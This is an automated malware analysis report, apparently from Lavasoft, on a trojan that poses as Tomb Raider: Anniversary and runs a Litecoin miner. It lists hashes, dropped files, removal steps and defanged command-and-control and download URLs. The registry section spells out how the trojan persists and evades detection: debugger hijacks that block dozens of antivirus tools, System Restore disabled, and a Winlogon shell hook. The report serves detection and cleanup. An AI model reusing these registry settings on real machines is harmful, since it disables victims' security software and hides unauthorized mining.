Trojan.MSIL.Citron.ks (Kaspersky), Trojan.GenericKD.1607040 (B) (Emsisoft), Trojan.GenericKD.1607040 (AdAware), Trojan.MSIL.Bladabindi.2.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: cd8552c36a49c885054202b0ec31b79a
SHA1: 72600be5c1ad5d2e1aa6a4ccaf0ff336b454d562
SHA256: c489131bea17df0bb57ff25187313adee776b8fe9655205f53ded82700a12420
SSDeep: 6144:wpMvLP3P8CzGNErLTIdVAysdEM8WLDH2 fGMMcHrxmVWI0y12lh8hIpSchJ7dX:Qa/kCzaEfoAP0cHlfGMMcHi70y12lhOC
Size: 385024 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-03-12 16:02:00
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
WScript.exe:2280
WScript.exe:3524
wuauclt.exe:304
cvtres.exe:2696
cvtres.exe:3396
vbc.exe:1128
vbc.exe:2912
vbc.exe:2688
vbc.exe:3780
vbc.exe:672
The Trojan injects its code into the following process(es):
cvtres.exe:3500
nt32.exe:1324
%original file name%.exe:1180
63462.exe:2876
File activity
The process wuauclt.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
The Trojan deletes the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)
The process nt32.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
C:\NTKernel\load32 (7972 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (54 bytes)
%Documents and Settings%\%current user%\My Documents\315load32.exe (2105 bytes)
%Documents and Settings%\All Users\Application Data\load32.exe (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
C:\NTKernel\63462.exe (32324 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (126 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)
The process %original file name%.exe:1180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\load32.vbs (901 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
C:\NTKernel\nt32.exe (2105 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)
Registry activity
The process WScript.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 14 2C B3 A3 65 26 38 5D 96 96 55 38 67 53 E1"
The process WScript.exe:3524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 1D 6F F9 83 AC 69 97 A6 1C 3E A6 6D 90 C0 9F"
The process cvtres.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C A3 2D 47 C1 E2 08 0E FC 2D 80 E2 A5 3A 7A 68"
The process cvtres.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 5A D0 36 4C BB 93 51 22 AB 3A 65 67 42 E4 A8"
The process nt32.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"63462.exe" = "Tomb Raider: Anniversary"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt32.exe]
"DisableExceptionChainValidation" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 E6 AC A4 EE E6 B0 25 8B D7 E9 23 36 50 A7 73"
[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://ltc.give-me-coins.com:3333 -O cbbamd.CPU:1234 -t THREADS"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\NTKernel\nt32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service"
"VMware User Process"
"VMware Tools"
"Adobe ARM"
"SunJavaUpdateSched"
"Adobe Reader Speed Launcher"
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Microsoft"
The process vbc.exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 E9 8C 2D 08 26 25 91 07 6C A3 FC DB 92 73 2D"
The process vbc.exe:2912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 5E 81 E2 3D E2 41 6E FF C5 45 84 4D D0 18 17"
The process vbc.exe:2688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 1F 91 3E 35 F5 77 A1 B8 AD 93 DC 0F 62 D3 E0"
The process vbc.exe:3780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 97 A3 BC CF 7F 1D 71 8F 2F EB 51 47 90 7B 36"
The process vbc.exe:672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 88 86 FB A4 8F 14 18 46 E6 B8 8C 49 C6 3E AF"
The process %original file name%.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"
[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"nt32.exe" = "Tomb Raider: Anniversary"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A FD 36 BB E0 02 ED BB E3 30 CF 4B FB CA F4 2E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://ltc.give-me-coins.com:3333 -O cbbamd.CPU:1234 -t THREADS"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "c:\%original file name%.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service"
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Microsoft"
The process 63462.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 7B 99 8F 38 65 F9 35 65 2D C5 64 2B 0F E3 1F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
Dropped PE files
MD5 | File path |
---|---|
67f5238229333c061092f5a32e8c2ee1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\svchost.exe |
e4f7c0be34da7869241a69d2ff932843 | c:\NTKernel\63462.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
WScript.exe:2280
WScript.exe:3524
wuauclt.exe:304
cvtres.exe:2696
cvtres.exe:3396
vbc.exe:1128
vbc.exe:2912
vbc.exe:2688
vbc.exe:3780
vbc.exe:672 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
C:\NTKernel\load32 (7972 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (54 bytes)
%Documents and Settings%\%current user%\My Documents\315load32.exe (2105 bytes)
%Documents and Settings%\All Users\Application Data\load32.exe (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
C:\NTKernel\63462.exe (32324 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (126 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
C:\NTKernel\nt32.exe (2105 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "c:\%original file name%.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows" - Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Eidos Inc.
Product Name: Tomb Raider: Anniversary
Product Version: 1.0.9
Legal Copyright: Copyright (C) 2007 Eidos Inc.
Legal Trademarks: Crystal Dynamics(R), the Crystal Dynamics(R) logo and the Eidos(R) logo are registered trademarks of the Eidos Group of Companies
Original Filename: FlvPlayer.exe
Internal Name: FlvPlayer.exe
File Version: 1.0.9
File Description: Tomb Raider: Anniversary
Comments: Tomb Raider: Anniversary
Language: English (United States)
Company Name: Eidos Inc.Product Name: Tomb Raider: AnniversaryProduct Version: 1.0.9Legal Copyright: Copyright (C) 2007 Eidos Inc.Legal Trademarks: Crystal Dynamics(R), the Crystal Dynamics(R) logo and the Eidos(R) logo are registered trademarks of the Eidos Group of CompaniesOriginal Filename: FlvPlayer.exeInternal Name: FlvPlayer.exeFile Version: 1.0.9File Description: Tomb Raider: AnniversaryComments: Tomb Raider: AnniversaryLanguage: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 261812 | 262144 | 5.20951 | 73fb6f02c868f34b09ac3c9e87b325a8 |
.rsrc | 270336 | 118784 | 118784 | 4.34853 | 616065ae9776e72156a40aa493baa087 |
.reloc | 393216 | 12 | 512 | 0.070639 | f2d0169b522fda54bd2715b38c473014 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://popdown.me/wordpress/1/gate.php | 149.255.37.187 |
hxxp://ge.tt/api/1/files/9a2RqWN1/0/blob?download | 79.125.123.149 |
hxxp://open.ge.tt/1/files/9a2RqWN1/0/blob?download | |
hxxp://s3-3-w.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 | |
hxxp://ge.tt/api/1/files/6bcJvOg1/0/blob?download | 79.125.123.149 |
hxxp://open.ge.tt/1/files/6bcJvOg1/0/blob?download | |
hxxp://ec2-54-217-102-175.eu-west-1.compute.amazonaws.com/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download | |
hxxp://e6845.ce.akamaiedge.net/pca3-g2.crl | |
hxxp://e6845.ce.akamaiedge.net/CSC3-2009.crl | |
hxxp://e6845.ce.akamaiedge.net/CSC3-2009-2.crl | |
hxxp://e6845.ce.akamaiedge.net/pca3-g5.crl | |
hxxp://e6845.ce.akamaiedge.net/CSC3-2010.crl | |
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 | 176.32.109.121 |
hxxp://crl.verisign.com/pca3-g5.crl | 23.37.37.163 |
hxxp://csc3-2009-crl.verisign.com/CSC3-2009.crl | 23.37.37.163 |
hxxp://w269456.open.ge.tt/1/files/6bcJvOg1/0/blob?download | 54.247.122.87 |
